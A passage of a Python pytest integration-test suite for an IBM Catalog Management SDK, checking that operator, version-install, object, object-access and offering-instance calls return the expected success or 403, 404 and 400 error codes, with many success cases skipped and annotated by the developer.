def test_deploy_operators_returns_404_when_no_such_cluster(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.deploy_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id='invalid-'+self.cluster_id,
region=region_us_south,
all_namespaces=True,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_deploy_operators_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.deploy_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
all_namespaces=True,
version_locator_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_deploy_operators(self):
assert version_locator_id is not None
# possibly this user doesn't have right to get the cluster details
# until it is not clear it is skipped
# The specified cluster could not be found. If applicable, make sure that you target the correct account
# and resource group."
deploy_operators_response = self.catalog_management_service_authorized.deploy_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
all_namespaces=True,
version_locator_id=version_locator_id,
)
assert deploy_operators_response.get_status_code() == 200
list_operator_deploy_result = deploy_operators_response.get_result()
assert list_operator_deploy_result is not None
####
# List Operators
####
@needscredentials
def test_list_operators_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.list_operators(
x_auth_refresh_token=self.refresh_token_not_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_list_operators_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.list_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_list_operators_returns_404_when_no_such_cluster(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.list_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id='invalid-'+self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_list_operators(self):
assert version_locator_id is not None
# possibly this user doesn't have right to get the cluster details
# until it is not clear it is skipped
# The specified cluster could not be found. If applicable, make sure that you target the correct account
# and resource group."
list_operators_response = self.catalog_management_service_authorized.list_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
assert list_operators_response.get_status_code() == 200
list_operator_deploy_result = list_operators_response.get_result()
assert list_operator_deploy_result is not None
####
# Replace Operators
####
@needscredentials
def test_replace_operators_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.replace_operators(
x_auth_refresh_token=self.refresh_token_not_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
all_namespaces=True,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_replace_operators_returns_404_when_no_such_cluster(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.replace_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id='invalid-'+self.cluster_id,
region=region_us_south,
all_namespaces=True,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_replace_operators_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.replace_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
all_namespaces=True,
version_locator_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_replace_operators(self):
assert version_locator_id is not None
# possibly this user doesn't have right to get the cluster details
# until it is not clear it is skipped
# The specified cluster could not be found. If applicable, make sure that you target the correct account
# and resource group."
replace_operators_response = self.catalog_management_service_authorized.replace_operators(
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
all_namespaces=True,
version_locator_id=version_locator_id,
)
assert replace_operators_response.get_status_code() == 200
list_operator_deploy_result = replace_operators_response.get_result()
assert list_operator_deploy_result is not None
####
# Install Version
####
@needscredentials
def test_install_version_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.install_version(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_not_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_install_version_returns_404_when_no_such_cluster(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.install_version(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id='invalid-'+self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_install_version_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.install_version(
version_loc_id=bogus_version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_install_version(self):
assert version_locator_id is not None
# possibly this user doesn't have right to get the cluster details
# until it is not clear it is skipped
# The specified cluster could not be found. If applicable, make sure that you target the correct account
# and resource group."
install_version_response = self.catalog_management_service_authorized.install_version(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
assert install_version_response.get_status_code() == 202
####
# Preinstall Version
####
@needscredentials
def test_preinstall_version_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.preinstall_version(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_not_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_preinstall_version_returns_404_when_no_such_cluster(self):
# it requires a version where preinstall script is installed
# but I don't know how to do it
# once it is done possible to squeeze a 404 from the cluster
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.preinstall_version(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id='invalid-'+self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_preinstall_version_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.preinstall_version(
version_loc_id=bogus_version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_preinstall_version(self):
assert version_locator_id is not None
# Error: Attempt to run pre-install script on a version that has no pre-install script specified
preinstall_version_response = self.catalog_management_service_authorized.preinstall_version(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
assert preinstall_version_response.get_status_code() == 202
####
# Get Preinstall
####
@needscredentials
def test_get_preinstall_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.get_preinstall(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_not_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_preinstall_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.get_preinstall(
version_loc_id='invalid-'+version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_preinstall_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.get_preinstall(
version_loc_id=bogus_version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_preinstall(self):
assert version_locator_id is not None
# Error: Attempt to get pre-install status on a version that has no pre-install script
get_preinstall_response = self.catalog_management_service_authorized.get_preinstall(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
)
assert get_preinstall_response.get_status_code() == 200
install_status = get_preinstall_response.get_result()
assert install_status is not None
####
# Validate Install
####
@needscredentials
def test_validate_install_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.validate_install(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_not_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_validate_install_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.validate_install(
version_loc_id='invalid'+version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_validate_install_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.validate_install(
version_loc_id=bogus_version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_validate_install(self):
assert version_locator_id is not None
# possibly this user doesn't have right to get the cluster details
# until it is not clear it is skipped
# The specified cluster could not be found. If applicable, make sure that you target the correct account
# and resource group."
validate_install_response = self.catalog_management_service_authorized.validate_install(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
version_locator_id=version_locator_id,
)
assert validate_install_response.get_status_code() == 202
####
# Get Validation Status
####
@needscredentials
def test_get_validation_status_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.get_validation_status(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_not_authorized,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_validation_status_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.get_validation_status(
version_loc_id='invalid-'+version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_validation_status_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.get_validation_status(
version_loc_id=bogus_version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_get_validation_status(self):
assert version_locator_id is not None
get_validation_status_response = self.catalog_management_service_authorized.get_validation_status(
version_loc_id=version_locator_id,
x_auth_refresh_token=self.refresh_token_authorized,
)
assert get_validation_status_response.get_status_code() == 200
validation = get_validation_status_response.get_result()
assert validation is not None
####
# Get Override Values
####
@needscredentials
def test_get_override_values_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.get_override_values(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_override_values_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.get_override_values(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_override_values_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.get_override_values(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_override_values(self):
# requires validation run before this operation
assert version_locator_id is not None
get_override_values_response = self.catalog_management_service_authorized.get_override_values(
version_loc_id=version_locator_id,
)
assert get_override_values_response.get_status_code() == 200
result = get_override_values_response.get_result()
assert result is not None
####
# Search Objects
####
@needscredentials
def test_search_objects_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.search_objects(
query='',
collapse=True,
digest=True,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_search_objects_returns_200_when_user_is_not_authorized(self):
search_objects_response = self.catalog_management_service_not_authorized.search_objects(
query='name: '+object_name,
collapse=True,
digest=True,
)
assert search_objects_response.get_status_code() == 200
object_search_result = search_objects_response.get_result()
assert object_search_result is not None
@needscredentials
def test_search_objects(self):
limit = 1
offset = 0
while offset > 0:
search_objects_response = self.catalog_management_service_authorized.search_objects(
query='name: object*',
collapse=True,
digest=True,
limit=limit,
offset=offset,
)
assert search_objects_response.get_status_code() == 200
object_search_result = search_objects_response.get_result()
assert object_search_result is not None
offset_value = get_query_param(object_search_result.next, 'offset')
if offset_value is not None:
offset = offset_value
else:
offset = 0
####
# List Objects
####
@needscredentials
def test_list_objects_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.list_objects(
catalog_identifier=catalog_id,
name=' ',
sort=' '
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_list_objects_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.list_objects(
catalog_identifier=catalog_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_list_objects(self):
assert catalog_id is not None
limit = 1
offset = 0
while offset > 0:
list_objects_response = self.catalog_management_service_authorized.list_objects(
catalog_identifier=catalog_id,
limit=limit,
offset=offset,
)
assert list_objects_response.get_status_code() == 200
object_list_result = list_objects_response.get_result()
assert object_list_result is not None
offset_value = get_query_param(object_list_result.next, 'offset');
if offset_value is not None:
offset = offset_value
else:
offset = 0
####
# Replace Object
####
@needscredentials
def test_replace_object_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.replace_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
id=object_id,
name='updated-object-name-created-by-python-sdk',
parent_id=region_us_south,
kind=kind_vpe,
catalog_id=catalog_id,
data={},
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_replace_object_returns_404_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.replace_object(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
id='invalid-'+object_id,
name='updated-object-name-created-by-python-sdk',
parent_id=region_us_south,
kind=kind_vpe,
catalog_id=catalog_id,
data={},
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_replace_object_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.replace_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
id=object_id,
name='updated object name created by python sdk',
parent_id=region_us_south,
kind=kind_vpe,
catalog_id=catalog_id,
data={},
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_replace_object(self):
# cannot change name of object, what can be changed?
assert catalog_id is not None
assert object_id is not None
replace_object_response = self.catalog_management_service_authorized.replace_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
id=object_id,
name='updated-object-name-created-by-python-sdk',
parent_id=region_us_south,
kind=kind_vpe,
catalog_id=catalog_id,
data={},
)
assert replace_object_response.get_status_code() == 200
catalog_object = replace_object_response.get_result()
assert catalog_object is not None
####
# Get Object
####
@needscredentials
def test_get_object_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.get_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_object_returns_404_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.get_object(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_object(self):
assert catalog_id is not None
assert object_id is not None
get_object_response = self.catalog_management_service_authorized.get_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
assert get_object_response.get_status_code() == 200
catalog_object = get_object_response.get_result()
assert catalog_object is not None
####
# Get Object Audit
####
@needscredentials
def test_get_object_audit_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.get_object_audit(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_object_audit_returns_200_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
get_object_audit_response = self.catalog_management_service_authorized.get_object_audit(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
)
assert get_object_audit_response.get_status_code() == 200
audit_log = get_object_audit_response.get_result()
assert audit_log is not None
@needscredentials
def test_get_object_audit(self):
assert catalog_id is not None
assert object_id is not None
get_object_audit_response = self.catalog_management_service_authorized.get_object_audit(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
assert get_object_audit_response.get_status_code() == 200
audit_log = get_object_audit_response.get_result()
assert audit_log is not None
####
# Account Publish Object
####
@needscredentials
def test_account_publish_object_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.account_publish_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_account_publish_object_returns_404_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.account_publish_object(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_account_publish_object(self):
assert catalog_id is not None
assert object_id is not None
account_publish_object_response = self.catalog_management_service_authorized.account_publish_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
assert account_publish_object_response.get_status_code() == 202
####
# Shared Publish Object
####
@needscredentials
def test_shared_publish_object_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.shared_publish_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_shared_publish_object_returns_404_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.shared_publish_object(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_shared_publish_object(self):
assert catalog_id is not None
assert object_id is not None
# Error: An invalid catalog object was provided
shared_publish_object_response = self.catalog_management_service_authorized.shared_publish_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
assert shared_publish_object_response.get_status_code() == 202
####
# IBM Publish Object
####
@needscredentials
def test_ibm_publish_object_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.ibm_publish_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_ibm_publish_object_returns_404_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.ibm_publish_object(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_ibm_publish_object(self):
assert catalog_id is not None
assert object_id is not None
# Error: Object not approved to request publishing to IBM for
ibm_publish_object_response = self.catalog_management_service_authorized.ibm_publish_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
assert ibm_publish_object_response.get_status_code() == 202
####
# Public Publish Object
####
@needscredentials
def test_public_publish_object_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.public_publish_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_public_publish_object_returns_404_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.public_publish_object(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_public_publish_object(self):
assert catalog_id is not None
assert object_id is not None
# Error: Object not approved to request publishing to IBM for
public_publish_object_response = self.catalog_management_service_authorized.public_publish_object(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
assert public_publish_object_response.get_status_code() == 202
####
# Create Object Access
####
@needscredentials
def test_create_object_access_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.create_object_access(
catalog_identifier=catalog_id,
object_identifier=object_id,
account_identifier=self.account_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_create_object_access_returns_404_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.create_object_access(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
account_identifier=self.account_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_create_object_access(self):
assert catalog_id is not None
assert object_id is not None
create_object_access_response = self.catalog_management_service_authorized.create_object_access(
catalog_identifier=catalog_id,
object_identifier=object_id,
account_identifier=self.account_id,
)
assert create_object_access_response.get_status_code() == 201
####
# Get Object Access List
####
@needscredentials
def test_get_object_access_list_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.get_object_access_list(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_object_access_list_returns_200_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
get_object_access_list_response = self.catalog_management_service_authorized.get_object_access_list(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
)
assert get_object_access_list_response.get_status_code() == 200
object_access_list_result = get_object_access_list_response.get_result()
assert object_access_list_result is not None
# pager
@needscredentials
def test_get_object_access_list(self):
assert catalog_id is not None
assert object_id is not None
get_object_access_list_response = self.catalog_management_service_authorized.get_object_access_list(
catalog_identifier=catalog_id,
object_identifier=object_id,
)
assert get_object_access_list_response.get_status_code() == 200
object_access_list_result = get_object_access_list_response.get_result()
assert object_access_list_result is not None
####
# Get Object Access
####
@needscredentials
def test_get_object_access_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.get_object_access(
catalog_identifier=catalog_id,
object_identifier=object_id,
account_identifier=self.account_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_object_access_returns_404_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.get_object_access(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
account_identifier=self.account_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_object_access(self):
assert catalog_id is not None
assert object_id is not None
# Error: Error loading version with id: 6e263640-4805-471d-a30c-d7667325581c.
# e59ad442-d113-49e4-bcd4-5431990135fd: Error[404 Not Found]
get_object_access_response = self.catalog_management_service_authorized.get_object_access(
catalog_identifier=catalog_id,
object_identifier=object_id,
account_identifier=self.account_id,
)
assert get_object_access_response.get_status_code() == 200
object_access = get_object_access_response.get_result()
assert object_access is not None
####
# Add Object Access List
####
@needscredentials
def test_add_object_access_list_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_not_authorized.add_object_access_list(
catalog_identifier=catalog_id,
object_identifier=object_id,
accounts=[self.account_id],
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_add_object_access_list_returns_404_when_no_such_object(self):
assert catalog_id is not None
assert object_id is not None
try:
self.catalog_management_service_authorized.add_object_access_list(
catalog_identifier=catalog_id,
object_identifier='invalid-'+object_id,
accounts=[self.account_id],
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_add_object_access_list(self):
assert catalog_id is not None
assert object_id is not None
add_object_access_list_response = self.catalog_management_service_authorized.add_object_access_list(
catalog_identifier=catalog_id,
object_identifier=object_id,
accounts=[self.account_id],
)
assert add_object_access_list_response.get_status_code() == 201
access_list_bulk_response = add_object_access_list_response.get_result()
assert access_list_bulk_response is not None
####
# Create Offering Instance
####
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_create_offering_instance_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
assert offering_id is not None
# don't know what kind_format is needed here, vpe, helm and offering don't work
try:
self.catalog_management_service_authorized.create_offering_instance(
x_auth_refresh_token=self.refresh_token_authorized,
id=offering_id,
catalog_id='invalid-'+catalog_id,
offering_id=offering_id,
kind_format=kind_vpe,
version='0.0.2',
cluster_id=self.cluster_id,
cluster_region=region_us_south,
cluster_all_namespaces=True,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_create_offering_instance_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
# don't know what kind_format is needed here, vpe, helm and offering don't work
try:
self.catalog_management_service_not_authorized.create_offering_instance(
x_auth_refresh_token=self.refresh_token_authorized,
id=offering_id,
catalog_id=catalog_id,
offering_id=offering_id,
kind_format=kind_vpe,
version='0.0.2',
cluster_id=self.cluster_id,
cluster_region=region_us_south,
cluster_all_namespaces=True,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_create_offering_instance_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.create_offering_instance(
x_auth_refresh_token=self.refresh_token_authorized,
id=offering_id,
catalog_id=catalog_id,
offering_id=offering_id,
kind_format='bogus kind',
version='0.0.2',
cluster_id=self.cluster_id,
cluster_region=region_us_south,
cluster_all_namespaces=True,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_create_offering_instance(self):
global offering_instance_id
assert catalog_id is not None
assert offering_id is not None
create_offering_instance_response = self.catalog_management_service_authorized.create_offering_instance(
x_auth_refresh_token=self.refresh_token_authorized,
id=offering_id,
catalog_id=catalog_id,
offering_id=offering_id,
kind_format=kind_vpe,
version='0.0.2',
cluster_id=self.cluster_id,
cluster_region=region_us_south,
cluster_all_namespaces=True,
)
assert create_offering_instance_response.get_status_code() == 201
offering_instance_id = create_offering_instance_response.get_result()
assert offering_instance_id is not None
assert offering_instance_id['id'] is not None
offering_instance_id = offering_instance_id['id']
####
# Get Offering Instance
####
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_offering_instance_returns_403_when_user_is_not_authorized(self):
assert offering_instance_id is not None
try:
self.catalog_management_service_not_authorized.get_offering_instance(
instance_identifier=offering_instance_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_offering_instance_returns_404_when_no_such_offering_instance(self):
assert offering_instance_id is not None
try:
self.catalog_management_service_authorized.get_offering_instance(
instance_identifier='invalid-'+offering_instance_id
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_offering_instance(self):
assert offering_instance_id is not None
get_offering_instance_response = self.catalog_management_service_authorized.get_offering_instance(
instance_identifier=offering_instance_id,
)
assert get_offering_instance_response.get_status_code() == 200
offering_instance = get_offering_instance_response.get_result()
assert offering_instance is not None
####
# Put Offering Instance
####
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_put_offering_instance_returns_403_when_user_is_not_authorized(self):
assert offering_instance_id is not None
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_not_authorized.put_offering_instance(
instance_identifier=offering_instance_id,
x_auth_refresh_token=self.refresh_token_authorized,
id=offering_instance_id,
catalog_id=catalog_id,
offering_id=offering_id,
kind_format=kind_vpe,
version='0.0.3',
cluster_id=self.cluster_id,
cluster_region=region_us_south,
cluster_all_namespaces=True,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_put_offering_instance_returns_404_when_no_such_catalog(self):
assert offering_instance_id is not None
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.put_offering_instance(
instance_identifier=offering_instance_id,
x_auth_refresh_token=self.refresh_token_authorized,
id=offering_instance_id,
catalog_id='invalid-'+catalog_id,
offering_id=offering_id,
kind_format=kind_vpe,
version='0.0.3',
cluster_id=self.cluster_id,
cluster_region=region_us_south,
cluster_all_namespaces=True,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_put_offering_instance_returns_400_when_backend_input_validation_fails(self):
assert offering_instance_id is not None
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.put_offering_instance(
instance_identifier=offering_instance_id,
x_auth_refresh_token=self.refresh_token_authorized,
id=offering_instance_id,
catalog_id=catalog_id,
offering_id=offering_id,
kind_format='bogus kind',
version='0.0.3',
cluster_id=self.cluster_id,
cluster_region=region_us_south,
cluster_all_namespaces=True,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_put_offering_instance(self):
assert offering_instance_id is not None
assert catalog_id is not None
assert offering_id is not None
